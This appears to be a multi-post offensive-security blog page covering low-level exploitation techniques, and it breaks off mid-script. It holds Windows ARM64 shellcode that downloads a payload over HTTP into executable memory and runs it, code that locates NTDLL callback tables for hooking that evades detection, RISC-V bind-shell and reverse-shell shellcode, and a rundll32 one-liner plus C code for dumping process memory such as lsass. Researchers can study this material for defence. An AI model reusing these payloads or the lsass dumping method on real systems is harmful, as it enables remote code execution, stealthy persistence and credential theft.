Shellcode: Windows on ARM64 / AArch64

Introduction

Back in October 2018, I wanted to write ARM assembly on Windows. All I could acquire then was a Surface tablet running Windows RT that was released sometime in October 2012. Windows RT (now deprecated) was a version of Windows 8 designed to run on the 32-Bit ARMv7 architecture. By the summer of 2013, it was considered to be a commercial flop.

For developers, it was possible to compile binaries on a separate machine and get them running on the tablet via USB stick or network, but unless you wanted to obtain a developer license, a jailbreak exploit was required. Since there were too many limitations, my attention shifted towards Linux on a Raspberry Pi4.

From what I read, the release of Windows 10 for ARMv7 in 2015 was a distinct improvement over Windows RT. Limitations for developers persisted but at least Microsoft provided support for emulating x86 applications.

Today, I finally have an ARM64 device running Windows 11 without all the problems that plagued previous versions. There’s full native support for developers with Visual Studio 2022 and a Linux subsystem that can run Ubuntu or Debian if you want to program ARM64 applications for Linux. (I know WSL isn’t new, but still). Best of all perhaps is the ability to emulate both 32-bit and 64-bit applications for the x86 architecture.

Toolchain

To support Windows on ARM, you have at least three options:

MSVC and LLVM-MinGW are best for C/C++. And I prefer the GNU Assembler (as) over the ARM Macro Assembler (armasm64) shipped by Microsoft, but the main problem with both is the lack of support for macros. armasm64 supports most of the directives documented by ARM, but appears to have limitations.

From what I can tell, ARMASM has no support for structures making it very difficult to write programs in assembly. This is also a problem with the GNU Assembler and the only way around it is to use symbolic names with the hardcoded offset of each field.

There is some hope. Despite having no direct support for the ARM architecture, flat assembler g (FASMG) by Tomasz Grysztar is an adaptable assembly engine that “has the ability to become an assembler for any CPU architecture.”. There are include files for fasmg which implement ARM64 instructions using macros and it’s what I decided to use for a simple PoC in this post.

Once you setup FASMG, copy the AARCH64 macros from asmFish to the include directory. My own batch file that I execute from a command prompt inside the root directory of fasm looks like this:

@echo off
set include=C:\fasmw\fasmg\packages\utility;C:\fasmw\fasmg\packages\x86\include
set path=%PATH%;C:\fasmw\fasmg\core

Thomas has also provided an ARM64 example to get started.

Calling Convention

Windows uses the same as what’s used on Linux for subroutines. However, invocation of system calls are different: Linux uses x8 to hold system call ID whereas Windows embeds the ID in the SVC instruction.

Register Volatile? Role
x0 Yes Parameter/scratch register 1, result register
x1-x7 Yes Parameter/scratch register 2-8
x8-x15 Yes Scratch registers. Used as parameter too.
x16-x17 Yes Intra-procedure-call scratch registers
x18 No Platform register: in kernel mode, points to KPCR for the current processor; in user mode, points to TEB
x19-x28 No
Scratch register
x29/fp No Frame pointer
x30/lr No Link register
x31/zxr No Zero register

Hello, World! (Console)

Initially, I started working with ARMASM, so the following is just an example of how to create a simple console application.

    ; armasm64 hello.asm -ohello.obj
    ; cl hello.obj /link /subsystem:console /entry:start kernel32.lib

    AREA    .drectve, DRECTVE

    ; invoke API without repeating the same instructions
    ; p1 should be the number of register available to load address of API
    MACRO
        INVOKE $p1, $p2          ; name of macro followed by number of parameters
        adrp   $p1, __imp_$p2
        ldr    $p1, [$p1, __imp_$p2]
        blr    $p1
    MEND

    ; saves time typing "__imp_" for each API imported
    MACRO
        IMPORT_API $p1
        IMPORT __imp_$p1
    MEND

    AREA    data, DATA

Text    DCB "Hello, World!\n"

; symbolic constants for clarity
NULL equ 0
STD_OUTPUT_HANDLE equ -11

    ; the entrypoint
    EXPORT start

    ; the API used
    IMPORT_API ExitProcess
    IMPORT_API WriteFile
    IMPORT_API GetStdHandle

    ; start of code to execute
    AREA    text, CODE
start   PROC
    mov         x0, STD_OUTPUT_HANDLE
    INVOKE      x1, GetStdHandle

    mov         x4, NULL
    mov         x3, NULL
    mov         x2, 14     ; string length...
    adr         x1,Text
    INVOKE      x5, WriteFile

    mov         x0, NULL
    INVOKE      x1, ExitProcess
    
    ENDP
    END

And a simple GUI. A version for FASMG can be found here.

Hello, World! (GUI)

    ; armasm64 msgbox.asm -omsgbox.obj
    ; cl msgbox.obj /link /subsystem:windows /entry:start kernel32.lib user32.lib

    AREA    .drectve, DRECTVE

    ; invoke API without repeating the same instructions
    ; p1 should be the free register available to load address of API
    MACRO
        INVOKE $p1, $p2
        adrp   $p1, __imp_$p2
        ldr    $p1, [$p1, __imp_$p2]
        blr    $p1
    MEND

    ; saves time typing "__imp_" for each API imported
    MACRO
        IMPORT_API $p1
        IMPORT __imp_$p1
    MEND

    AREA    data, DATA

Text    DCB "Hello, World!", 0x0
Caption DCB "Hello from ARM64", 0x0

; symbolic names for clarity
NULL equ 0

    ; the entrypoint
    EXPORT start

    ; the API used
    IMPORT_API ExitProcess
    IMPORT_API MessageBoxA

    ; start of code to execute
    AREA    text, CODE
start   PROC
    mov         x3,NULL
    adr         x2,Caption
    adr         x1,Text
    mov         x0,NULL
    INVOKE      x4, MessageBoxA

    mov         x0, NULL
    INVOKE      x1, ExitProcess
    
    ENDP
    END

Symbolic Names

; The following are 64-Bit offsets.
TEB_ProcessEnvironmentBlock                  = 0x00000060
TEB_LastErrorValue                           = 0x00000068

PEB_Ldr                                      = 0x00000018
PEB_LDR_DATA_InLoadOrderModuleList           = 0x00000010

LDR_DATA_TABLE_ENTRY_DllBase                 = 0x00000030

IMAGE_DOS_HEADER_e_lfanew                    = 0x0000003C

IMAGE_EXPORT_DIRECTORY_Characteristics       = 0x00000000
IMAGE_EXPORT_DIRECTORY_TimeDateStamp         = 0x0004
IMAGE_EXPORT_DIRECTORY_MajorVersion          = 0x0008
IMAGE_EXPORT_DIRECTORY_MinorVersion          = 0x000A
IMAGE_EXPORT_DIRECTORY_Name                  = 0x0000000C
IMAGE_EXPORT_DIRECTORY_Base                  = 0x00000010
IMAGE_EXPORT_DIRECTORY_NumberOfFunctions     = 0x00000014
IMAGE_EXPORT_DIRECTORY_NumberOfNames         = 0x00000018
IMAGE_EXPORT_DIRECTORY_AddressOfFunctions    = 0x0000001C
IMAGE_EXPORT_DIRECTORY_AddressOfNames        = 0x00000020
IMAGE_EXPORT_DIRECTORY_AddressOfNameOrdinals = 0x00000024

STATFLAG_DEFAULT = 0
STATFLAG_NONAME = 1
STATFLAG_NOOPEN = 2

STREAM_SEEK_SET	= 0
STREAM_SEEK_CUR	= 1
STREAM_SEEK_END	= 2

Structures and Unions

FASMG provides macros to support struct and union that are supported by Borland’s Turbo or Microsoft’s Macro Assembler.

struct LARGE_INTEGER
    LowPart  dd ?
    HighPart dd ?
ends

struct ULARGE_INTEGER
    LowPart  dd ?
    HighPart dd ?
ends

struct GUID
    Data1 	dd ?
    Data2 	dw ?
    Data3 	dw ?
    Data4 	db 8 dup(?)
ends
    
struct STATSTG
    pwcsName          dq ?   ; LPOLESTR
    _type             dd ?   ; DWORD
    _padding          dd ?   ; padding for _type
    cbSize            ULARGE_INTEGER
    mtime             FILETIME    
    ctime             FILETIME  
    atime             FILETIME
    grfMode           dd ?
    grfLocksSupported dd ?
    clsid             GUID
    grfStateBits      dd ?
    reserved          dd ?
ends

COM Interfaces

The shellcode uses the IStream object to read data from the HTTP request. FASMG provides macros to declare an interface. There’s also comcall and cominvk macros to invoke interface methods. I decided not to use them here. As pointed out before in relation to executing .NET assemblies, interfaces are just structures with function pointers.

struct IStreamVtbl
    ; IUnknown
    QueryInterface dq ?
    AddRef         dq ?
    Release        dq ?
    
    ; ISequentialStream
    Read           dq ?
    Write          dq ?
    
    ; IStream
    Seek           dq ?
    SetSize        dq ?
    CopyTo         dq ?
    Commit         dq ?
    Revert         dq ?
    LockRegion     dq ?
    UnlockRegion   dq ?
    Stat           dq ?
    Clone          dq ?
ends
          
struct IStream
    lpVtbl         dq ? ; pointer to IStreamVtbl
ends

Local Variables

FASMG doesn’t support these out of the box. But what you can do is define a structure with your variables in it.

struct var_tbl
    pStream   IStream
    Stg       STATSTG
    liZero    LARGE_INTEGER
    BytesRead dq ?
    pCode     dq ?
ends

At the entry of program or subroutine, subtract the size of the structure (aligned by 16) from the stack pointer.

    sub        sp, sp, ((sizeof.var_tbl + 15) and -16)

Then when you need to address a variable, offsets can be accessed with the ADD instruction.

    ; x2 = &var_tbl.pStream
    add        x2, sp, var_tbl.pStream

To access the value store in var_tbl.pStream

    ; x2 = var_tbl.pStream
    ldr        x2, [sp, var_tbl.pStream]

Macros

The most powerful feature of FASMG is its support for macros. It’s possible to implement cryptographic hashes like SHA256, SHA512 and SHA3 purely with macros. The following doesn’t demonstrate the full potential of FASMG at all.

macro hash_api dll_name, api_name
    local dll_hash, api_hash, b

    ; DLL 
    virtual at 0  
        db dll_name  
        dll_hash = 0  
        repeat $
            load b byte from % - 1  
            dll_hash = (dll_hash + b) and 0xFFFFFFFF
            dll_hash = ((dll_hash shr 8) and 0xFFFFFFFF) or ((dll_hash shl 24) and 0xFFFFFFFF) 
        end repeat  
    end virtual

    ; API
    virtual at 0  
        db api_name  
        api_hash = 0  
        repeat $
            load b byte from % - 1
            api_hash = (api_hash + b) and 0xFFFFFFFF
            api_hash = ((api_hash shr 8) and 0xFFFFFFFF) or ((api_hash shl 24) and 0xFFFFFFFF) 
        end repeat  
    end virtual

    dd (dll_hash + api_hash) and 0xFFFFFFFF
end macro

Thread Environment Block

xpr is an alias for the x18 register. As noted in the table of integer registers, it contains a pointer to the TEB for user-mode applications. Every offset used by AMD64 can probably be used for ARM64. However, it would be safer check debugging symbols.

System Calls

For x86, the syscall number is placed in the accumulator (EAX/RAX) but for ARM64, it’s embedded in the SVC opcode itself and there appears to be no alternative. (at least not that I’m aware of). To build a new stub would require using NtAllocateVirtualMemory and manually encoding the instruction.

HTTP Download

The following code uses URLOpenBlockingStream to download a shellcode and execute in memory.

start:
    ;brk        #0xF000
    
    sub        sp, sp, ((sizeof.var_tbl + 15) and -16)
    
    adr        x20, hash_tbl
    adr        x21, invoke_api

    ; LoadLibraryA("urlmon.dll")
    adr        x0, urlmon_name
    blr        x21
    cbz        x0, exit_shellcode
    
    ; hr = URLOpenBlockingStreamA(NULL, szUrl, &pStream, 0, 0);
    mov        x4, xzr
    mov        x3, xzr
    add        x2, sp, var_tbl.pStream
    adr        x1, url_path
    mov        x0, xzr           ; NULL
    blr        x21
    cbnz       x0, exit_shellcode
    
    ; STATSTG Stg;
    ; hr = pStream->Stat(&Stg, STATFLAG_NONAME);
    mov        x2, STATFLAG_NONAME
    add        x1, sp, var_tbl.Stg
    ldr        x0, [sp, var_tbl.pStream]
    ldr        x3, [x0, IStream.lpVtbl]
    ldr        x3, [x3, IStreamVtbl.Stat]
    blr        x3
    cbnz       x0, exit_shellcode    
    
    ; LARGE_INTEGER liZero = { 0 }; 
    ; hr = pStream->Seek(liZero, STREAM_SEEK_SET, NULL);
    mov        x3, xzr                ; NULL
    mov        x2, xzr                ; STREAM_SEEK_SET
    add        x1, sp, var_tbl.liZero
    str        xzr, [x1]
    mov        x1, xzr
    ldr        x0, [sp, var_tbl.pStream]
    ldr        x4, [x0, IStream.lpVtbl]
    ldr        x4, [x4, IStreamVtbl.Seek]
    blr        x4 
    cbnz       x0, exit_shellcode  
    
    ; pCode = VirtualAlloc(NULL, Stg.cbSize.LowPart, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    mov        x3, PAGE_EXECUTE_READWRITE
    mov        x2, MEM_COMMIT
    ldr        w1, [sp, var_tbl.Stg.cbSize.LowPart]
    mov        x0, NULL
    blr        x21
    cbz        x0, exit_shellcode  
    
    str        x0, [sp, var_tbl.pCode]
    
    ; hr = pStream->Read(pCode, Stg.cbSize.LowPart, &BytesRead);
    add        x3, sp, var_tbl.BytesRead
    ldr        w2, [sp, var_tbl.Stg.cbSize.LowPart]
    ldr        x1, [sp, var_tbl.pCode]
    ldr        x0, [sp, var_tbl.pStream]
    ldr        x4, [x0, IStream.lpVtbl]
    ldr        x4, [x4, IStreamVtbl.Read]
    blr        x4
    cbnz       x0, exit_shellcode  
    
    ldr        x0, [sp, var_tbl.pCode]
    blr        x0
    
    blr        x21
    cbz        x0, exit_shellcode 
exit_shellcode:
    add        sp, sp, ((sizeof.var_tbl + 15) and -16)
    ret
    
invoke_api:
    ; save parameters, except for x0, which won't be used.
    stp        x1, x2, [sp, -64]!
    stp        x3, x4, [sp, 16]
    stp        x5, x6, [sp, 32]
    stp        x7, x8, [sp, 48]

    ; Ldr = (PPEB_LDR_DATA)NtCurrentTeb()->ProcessEnvironmentBlock->Ldr;
    mov        x1, x18 ; xpr
    ldr        x2, [x1, TEB_ProcessEnvironmentBlock]
    ldr        x2, [x2, PEB_Ldr]
    
    ; end = (PLIST_ENTRY)&Ldr->InLoadOrderModuleList;
    add        x2, x2, PEB_LDR_DATA_InLoadOrderModuleList
    ; nxt = end->Flink;
    ldr        x3, [x2]            ; read first entry
nxt_dll:
    cmp        x3, x2              ; while (nxt != end)
    bne        load_dll_loop
    add        sp, sp, 64          ; fixup stack
    ;ret                            ; return to caller
load_dll_loop:
    ; bx = e->DllBase 
    ldr        x4, [x3, LDR_DATA_TABLE_ENTRY_DllBase]         
    ldr        x3, [x3]            ; nxt = nxt->Flink
    
    ; nt = VA(PIMAGE_NT_HEADERS, bx, ((PIMAGE_DOS_HEADER)e->DllBase)->e_lfanew);
    ldr        w5, [x4, IMAGE_DOS_HEADER_e_lfanew]     
    add        x5, x4, w5, uxtw #0 
    
    ; va = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    ; if (!va) continue;
    ldr        w5, [x5, #0x88]     
    cbz        w5, nxt_dll         
    
    ; exp = VA(PIMAGE_EXPORT_DIRECTORY, bx, va);
    add        x5, x4, w5, uxtw #0 
    
    ; cnt = exp->NumberOfNames;
    ; if (!cnt) continue;
    ldr        w6, [x5, IMAGE_EXPORT_DIRECTORY_NumberOfNames]    
    cbz        w6, nxt_dll        
    
    ; dll = VA(PCHAR, bx, exp->Name);
    ldr        w7, [x5, IMAGE_EXPORT_DIRECTORY_Name]      
    add        x7, x4, w7, uxtw #0

    mov        w8, #0              ; dx = 0
hash_dll:
    ; while (*dll) c = *dll++, 
    ; c = (c >= 'A' && c <= 'Z') ? (c | 32) : c, dx += c, dx = R(dx, 8);
    ldrsb      x9, [x7], 1        
    cbz        x9, exit_hash_dll
    
    sub        x10, x9, 'A'
    orr        x11, x9, 32
    cmp        x10, 26
    csel       x9, x11, x9, cc
    add        w8, w8, w9
    ror        w8, w8, 8
    b          hash_dll
exit_hash_dll:
    ; aon = VA(PDWORD, bx, exp->AddressOfNames);
    ldr        w9, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfNames]
    add        x9, x4, w9, uxtw #0
    mov        x10, #0
nxt_api:
    mov        x11, #0
    ; api = VA(PCHAR, bx, aon[i]);
    ldr        w12, [x9, w10, uxtw #2] 
    add        x12, x4, w12, uxtw #0
hash_api_loop:
    ; while (*api) ax += *api++, ax = R(ax, 8);
    ldrsb      x13, [x12], 1
    cbz        x13, exit_hash_api
    
    add        w11, w11, w13
    ror        w11, w11, 8
    b          hash_api_loop
exit_hash_api:
    add        w11, w11, w8    ; 
    ldr        w12, [x20]      ; load hash
    cmp        w11, w12        ; if ((ax + dx) == hx)
    beq        load_api
    
    add        w10, w10, 1     ; i++
    cmp        w10, w6         ; i < cnt
    bne        nxt_api
    b          nxt_dll
    
load_api:
    add        x20, x20, 4
    
    ; aof = VA(PDWORD, bx, exp->AddressOfFunctions);
    ldr        w1, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfFunctions]
    add        x1, x4, x1
    
    ; ono = VA(PDWORD, bx, exp->AddressOfNameOrdinals);
    ldr        w2, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfNameOrdinals]  
    add        x2, x4, x2
    
    ; pfn = VA(PVOID, bx, aof[ono[i]]);
    ldrh       w2, [x2, w10, uxtw #1]  ; read ordinal
    ldr        w1, [x1, x2, lsl #2]    ; read address of function rva
    add        x9, x4, w1, uxtw #0     ; add base

    ; load parameters saved on stack
    ldp        x1, x2, [sp], 16
    ldp        x3, x4, [sp], 16
    ldp        x5, x6, [sp], 16
    ldp        x7, x8, [sp], 16
    
    ; execute API and return to original caller.
    br         x9   
hash_tbl:
    hash_api "kernelbase.dll", "LoadLibraryA"
    hash_api "urlmon.dll",     "URLOpenBlockingStreamA"
    hash_api "kernelbase.dll", "VirtualAlloc"
    hash_api "kernelbase.dll", "ExitThread"
urlmon_name:
    db "urlmon", 0
url_path:
    db "http://localhost:1234/notepad.arm64.bin", 0

Further Reading

Posted in arm, assembly, shellcode, windows | Tagged , , , | Leave a comment

Delegated NT DLL

Introduction

redplait and Adam/Hexacorn already documented this in 2017 and 2018 respectively, so it’s not a new discovery. Officially available since RedStone 2 released in April 2017, redplait states it was introduced with insider build 15007 released in January 2017. It has similarities with the WOW64 function table present in AMD64 versions of NTDLL.

References

Observations

Using IDA Pro or Ghidra with support for debugging symbols enabled, the table can be found at ntdll!_LdrpDelegatedNtdllExports

The DLL itself would be found in one of the following paths.

ArchPath
x86C:\Windows\System32\
AMD64C:\Windows\SysWOW64\
ARM64C:\Windows\SysWOW64\

Table

The table containing function pointers on my system appears in the .text section which indicates the DLL was compiled with .rdata and .text merged. Therefore the PoC to locate the table may or may not work for you unless you change the section to .rdata. Safe to assume it’s in read-only memory on some systems but I haven’t checked. It contains the addresses of at least thirteen function pointers located in the .data section. There may be more or less depending on the build.

The interesting thing is that, like the WOW64 table, the NT delegate table provides a simple way to intercept a variety of callbacks in 32-bit mode without the need to overwrite code with inline hooking. Most tools designed to detect malicious hooks look at executable code rather than changes to function pointers that normally reside in read-only or read-write memory.

PoC to find table

Posted in data structures, security, windows | Tagged , , , , , , , , | Leave a comment

WOW64 Callback Table (FinFisher)

Introduction

Ken Johnson (otherwise known as Skywing) first talked about the KiUserExceptionDispatcher back in 2007 . Since then, scattered around the internet are various posts talking about it, but for some reason nobody demonstrating how to use it. It’s been documented that FinFisher misuses the function pointers as part of its virtual machine functionality, so let’s take a look at how to find the table before doing anything creative with it…The code to locate the table didn’t take long and didn’t require looking at FinFisher internals or existing code. It’s a simple heuristic based search.

References

Observations

If you take a look at ntdll!LdrpLoadWow64, that’s called during initialization of a WOW64 process, you’ll see it loading wow64.dll and resolving the address of six exports. This process has been better documented in the posts mentioned above.

  • Wow64LdrpInitialize
  • Wow64PrepareForException
  • Wow64ApcRoutine
  • Wow64PrepareForDebuggerAttach
  • Wow64SuspendLocalThread
  • Wow64SuspendLocalProcess

A closer look at how this works will provide you with an array of function names stored in STRING format and a pointer to a variable that holds each address resolved. The following is my attempt at recreating the same structure.

typedef union _W64_T {
    LPVOID p;
    DWORD64 q;
    LPVOID *pp;
} W64_T;
    
typedef struct _WOW64_CALLBACK {
    STRING Name;
    W64_T  Function;
} WOW64_CALLBACK, *PWOW64_CALLBACK;

//
// Structure based on 64-bit version of NTDLL on Windows 10
//
typedef struct _WOW64_CALLBACK_TABLE {
    WOW64_CALLBACK  Wow64LdrpInitialize;
    WOW64_CALLBACK  Wow64PrepareForException;
    WOW64_CALLBACK  Wow64ApcRoutine;
    WOW64_CALLBACK  Wow64PrepareForDebuggerAttach;
    WOW64_CALLBACK  Wow64SuspendLocalThread;
    WOW64_CALLBACK  Wow64SuspendLocalProcess;
} WOW64_CALLBACK_TABLE, *PWOW64_CALLBACK_TABLE;

WOW64_CALLBACK_TABLE Wow64Table = {
    {RTL_CONSTANT_STRING("Wow64LdrpInitialize"), NULL},
    {RTL_CONSTANT_STRING("Wow64PrepareForException"), NULL},
    {RTL_CONSTANT_STRING("Wow64ApcRoutine"), NULL},
    {RTL_CONSTANT_STRING("Wow64PrepareForDebuggerAttach"), NULL},
    {RTL_CONSTANT_STRING("Wow64SuspendLocalThread"), NULL},
    {RTL_CONSTANT_STRING("Wow64SuspendLocalProcess"), NULL}
    };

Locating Table

There could be a number of ways to do this. In the following example, we search the .rdata section for STRING structures that equal the function pointer we wish to find. Since these strings are constant and unlikely to change, it works reasonably well.

BOOL 
IsReadOnlyPtr(LPVOID ptr) {
    MEMORY_BASIC_INFORMATION mbi;
    
    if (!ptr) return FALSE;
    
    DWORD res = VirtualQuery(ptr, &mbi, sizeof(mbi));
    if (res != sizeof(mbi)) return FALSE;

    return ((mbi.State   == MEM_COMMIT    ) &&
            (mbi.Type    == MEM_IMAGE     ) && 
            (mbi.Protect == PAGE_READONLY));
}

BOOL
GetWow64FunctionPointer(PWOW64_CALLBACK Callback) {
    auto m = (PBYTE)GetModuleHandleW(L"ntdll");
    auto nt = (PIMAGE_NT_HEADERS)(m + ((PIMAGE_DOS_HEADER)m)->e_lfanew);
    auto sh = IMAGE_FIRST_SECTION(nt);
    
    for (DWORD i=0; i<nt->FileHeader.NumberOfSections; i++) {
        if (*(PDWORD)sh[i].Name == *(PDWORD)".rdata") {
            auto rva = sh[i].VirtualAddress;
            auto cnt = (sh[i].Misc.VirtualSize - sizeof(STRING)) / sizeof(ULONG_PTR);
            auto ptr = (PULONG_PTR)(m + rva);
            
            for (DWORD j=0; j<cnt; j++) {
                if (!IsReadOnlyPtr((LPVOID)ptr[j])) continue;
                
                auto api = (PSTRING)ptr[j];

                if (api->Length == Callback->Name.Length && 
                    api->MaximumLength == Callback->Name.MaximumLength) 
                {
                    if (!strncmp(api->Buffer, Callback->Name.Buffer, Callback->Name.Length)) {
                        Callback->Function.p = (PVOID)ptr[j + 1];
                        return TRUE;
                    }
                }
            }
            break;
        }
    }
    return FALSE;
}

void
GetWow64CallbackTable(PWOW64_CALLBACK_TABLE Table) {
    GetWow64FunctionPointer(&Table->Wow64LdrpInitialize);
    GetWow64FunctionPointer(&Table->Wow64PrepareForException);
    GetWow64FunctionPointer(&Table->Wow64ApcRoutine);
    GetWow64FunctionPointer(&Table->Wow64PrepareForDebuggerAttach);
    GetWow64FunctionPointer(&Table->Wow64SuspendLocalThread);
    GetWow64FunctionPointer(&Table->Wow64SuspendLocalProcess);
}

Summary

This type of code isn’t useful to a 32-Bit WOW process without jumping to 64-Bit since the function pointers are stored in the 64-Bit version of NTDLL. There are potentially other uses though like intercepting APCs, anti-debugging and processing exceptions before VEH or SEH, which FinFisher did successfully for many many years….

PoC here

Posted in assembly, data structures, programming, security, windows | Tagged , , | 1 Comment

Shellcode: Linux on RISC-V 64-Bit

RISC-V (pronounced “risk-five” ) is an open standard instruction set architecture (ISA) based on established reduced instruction set computer (RISC) principles. Unlike most other ISA designs, RISC-V is provided under open source licenses that do not require fees to use.

To learn more about the RISC-V architecture, I recently bought a StarFive VisionFive Single Board computer. It’s slightly more expensive than the RPI that runs on ARM, but it’s the closest thing to an RPI we have available right now. It uses the SiFive’s U74 64-bit RISC-V processor core which is similar to the ARM Cortex-A55. Readers without access to a board like this have the option of using QEMU.

You can view the shellcodes here.

The RISC-V ISA (excluding extensions) is of course much smaller than the ARM ISA, but that also makes it easier to learn IMHO. The reduced set of instructions is more suitable for beginners learning their first assembly language. From a business perspective, and I accept I’m not an expert on such issues, the main advantages of RISC-V over ARM is that it’s open source, has no licensing fees and is sanction-free. For those reasons, it may very well become more popular than ARM in future. We’ll have to wait and see.

  X86 (AMD64) ARM64 RISC-V 64
Registers RAX-R15 X0-X31 A0-A31
Syscall Register RAX X8 A7
Return Register RAX X0 A0
Zero Register N/A XMR X0
Relative Addressing LEA ADR LA
Data Transfer (Register) MOV MOV MV
Data Transfer (Immediate) MOV MOV LI
Execute System Call SYSCALL SVC ECALL

Execute /bin/sh

    # 48 bytes
 
    .include "include.inc"

    .global _start
    .text

_start:
    # execve("/bin/sh", NULL, NULL);
    li     a7, SYS_execve
    mv     a2, x0           # NULL
    mv     a1, x0           # NULL
    li     a3, BINSH        # "/bin/sh"
    sd     a3, (sp)         # stores string on stack
    mv     a0, sp
    ecall

Execute Command

    # 112 bytes

    .include "include.inc"
    
    .global _start
    .text

_start:
    # execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);
    addi   sp, sp, -64           # allocate 64 bytes of stack
    li     a7, SYS_execve
    li     a0, BINSH             # a0 = "/bin/sh\0"
    sd     a0, (sp)              # store "/bin/sh" on the stack
    mv     a0, sp
    li     a1, 0x632D            # a1 = "-c"
    sd     a1, 8(sp)             # store "-c" on the stack
    addi   a1, sp, 8
    la     a2, cmd               # a2 = cmd
    sd     a0, 16(sp)
    sd     a1, 24(sp)
    sd     a2, 32(sp)
    sd     x0, 40(sp)
    addi   a1, sp, 16            # a1 = {"/bin/sh", "-c", cmd, NULL}
    mv     a2, x0                # penv = NULL
    ecall 
cmd:
    .asciz "echo Hello, World!"

Bind Shell

    # 176 bytes
 
    .include "include.inc"

    .equ PORT, 1234

    .global _start
    .text

_start:
    addi   sp, sp, -16
    
    # s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    li     a7, SYS_socket
    li     a2, IPPROTO_IP
    li     a1, SOCK_STREAM
    li     a0, AF_INET
    ecall
    
    mv     a3, a0
    
    # bind(s, &sa, sizeof(sa));  
    li     a7, SYS_bind
    li     a2, 16
    li     a1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET) 
    sd     a1, (sp)
    sd     x0, 8(sp)
    mv    a1, sp
    ecall
  
    # listen(s, 1);
    li     a7, SYS_listen
    li     a1, 1
    mv     a0, a3
    ecall
    
    # r = accept(s, 0, 0);
    li     a7, SYS_accept
    mv     a2, x0
    mv     a1, x0
    mv     a0, a3
    ecall
    
    mv     a4, a0
 
    # in this order
    #
    # dup3(s, STDERR_FILENO, 0);
    # dup3(s, STDOUT_FILENO, 0);
    # dup3(s, STDIN_FILENO,  0);
    li     a7, SYS_dup3
    li     a1, STDERR_FILENO + 1
c_dup:
    mv     a0, a4
    addi   a1, a1, -1
    ecall
    bne    a1, zero, c_dup

    # execve("/bin/sh", NULL, NULL);
    li     a7, SYS_execve
    mv     a2, x0
    mv     a1, x0
    li     a0, BINSH
    sd     a0, (sp)
    mv     a0, sp
    ecall

Reverse Connect Shell

    # 140 bytes

    .include "include.inc"

    .equ PORT, 1234
    .equ HOST, 0x0100007F # 127.0.0.1

    .global _start
    .text

_start:
    addi    sp, sp, -16
    
    # s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    li      a7, SYS_socket
    li      a2, IPPROTO_IP
    li      a1, SOCK_STREAM
    li      a0, AF_INET
    ecall
    
    mv      a3, a0       # a3 = s
    
    # connect(s, &sa, sizeof(sa));
    li      a7, SYS_connect
    li      a2, 16
    li      a1, ((HOST << 32) | ((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    sd      a1, (sp)
    mv      a1, sp       # a1 = &sa 
    ecall
  
    # in this order
    #
    # dup3(s, STDERR_FILENO, 0);
    # dup3(s, STDOUT_FILENO, 0);
    # dup3(s, STDIN_FILENO,  0);
    li      a7, SYS_dup3
    li      a1, STDERR_FILENO + 1
c_dup:
    mv      a2, x0
    mv      a0, a3
    addi    a1, a1, -1
    ecall
    bne     a1, zero, c_dup

    # execve("/bin/sh", NULL, NULL);
    li      a7, SYS_execve
    li      a0, BINSH
    sd      a0, (sp)
    mv      a0, sp
    ecall

Further Reading

Posted in Uncategorized | Leave a comment

MiniDumpWriteDump via COM+ Services DLL

Introduction

This will be a very quick code-oriented post about a DLL function exported by comsvcs.dll that I was unable to find any reference to online.

UPDATE: Memory Dump Analysis Anthology Volume 1 that was published in 2008 by Dmitry Vostokov, discusses this function in a chapter on COM+ Crash Dumps. The reason I didn’t find it before is because I was searching for “MiniDumpW” and not “MiniDump”.

While searching for DLL/EXE that imported DBGHELP!MiniDumpWriteDump, I discovered comsvcs.dll exports a function called MiniDumpW which appears to have been designed specifically for use by rundll32. It will accept three parameters but the first two are ignored. The third parameter should be a UNICODE string combining three tokens/parameters wrapped in quotation marks. The first is the process id, the second is where to save the memory dump and third requires the keyword “full” even though there’s no alternative for this last parameter.

To use from the command line, type the following: "rundll32 C:\windows\system32\comsvcs.dll MiniDump "1234 dump.bin full"" where “1234” is the target process to dump. Obviously, this assumes you have permission to query and read the memory of target process. If COMSVCS!MiniDumpW encounters an error, it simply calls KERNEL32!ExitProcess and you won’t see anything. The following code in C demonstrates how to invoke it dynamically.

BTW, HRESULT is probably the wrong return type. Internally it exits the process with E_INVALIDARG if it encounters a problem with the parameters, but if it succeeds, it returns 1. S_OK is defined as 0.

#define UNICODE
#include <windows.h>
#include <stdio.h>

typedef HRESULT (WINAPI *_MiniDumpW)(
  DWORD arg1, DWORD arg2, PWCHAR cmdline);
  
typedef NTSTATUS (WINAPI *_RtlAdjustPrivilege)(
  ULONG Privilege, BOOL Enable, 
  BOOL CurrentThread, PULONG Enabled);

// "<pid> <dump.bin> full"
int wmain(int argc, wchar_t *argv[]) {
    HRESULT             hr;
    _MiniDumpW          MiniDumpW;
    _RtlAdjustPrivilege RtlAdjustPrivilege;
    ULONG               t;
    
    MiniDumpW          = (_MiniDumpW)GetProcAddress(
      LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
      
    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
      GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
    
    if(MiniDumpW == NULL) {
      printf("Unable to resolve COMSVCS!MiniDumpW.\n");
      return 0;
    }
    // try enable debug privilege
    RtlAdjustPrivilege(20, TRUE, FALSE, &t);
        
    printf("Invoking COMSVCS!MiniDumpW(\"%ws\")\n", argv[1]);
   
    // dump process
    MiniDumpW(0, 0,  argv[1]);
    printf("OK!\n");
    
    return 0;
}

Since neither rundll32 nor comsvcs!MiniDumpW will enable the debugging privilege required to access lsass.exe, the following VBscript will work in an elevated process.

Option Explicit

Const SW_HIDE = 0

If (WScript.Arguments.Count <> 1) Then
    WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
    WScript.StdOut.WriteLine("Usage: procdump <process>")
    WScript.Quit
Else
    Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp
    
    ' get process id or name
    pid = WScript.Arguments(0)
    
    ' connect with debug privilege
